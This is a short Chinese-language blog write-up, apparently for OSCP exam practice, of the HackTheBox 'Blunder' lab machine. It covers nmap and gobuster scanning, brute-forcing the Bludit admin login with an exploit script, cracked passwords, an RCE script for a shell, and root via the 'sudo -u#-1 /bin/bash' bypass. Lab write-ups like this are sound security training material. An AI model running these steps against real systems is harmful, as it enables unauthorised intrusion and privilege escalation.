OSCP备考_0x28_HackThBox靶机_Linux_blunder

Ethan医生7个月前 (07-03)靶场232

blunder

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)

nmap -sU --top-ports 100 10.129.193.124 (扫描UDP)

gobuster dir -u http://10.129.193.124/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html

http://10.129.193.124/todo.txt ,发现有fergus用户

查看有没有漏洞

python3 48942.py -l http://10.129.193.124/admin/login.php -u user.txt -p /usr/share/wordlists/my_list/passwd-EN-Top10000.txt

进行爆破

最后发现密码为RolandDeschain

我们获得密码之后还是无法登录

在我们搜索bludit得时候我们看不到rce，然后使用这个脚本，但是要将脚本进行修改才能使用

然后执行脚本就获得shell

这个密码爆破不了

然后就去另一个版本里面找答案bludit-3.10.0a

然后使用在线的破解工具

hugo,Password120

切换到hugo然后执行sudo -l

发现可以使用/bin/bash

然后使用sudo -u#-1 /bin/bash获得root

标签: OSCP

返回列表

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)查看到版本是2.3,有rcepython3 49125.p...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.184.136 (扫描TCP)nmap -sU --top-ports 100 10.129.184.136...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

EthanDoctor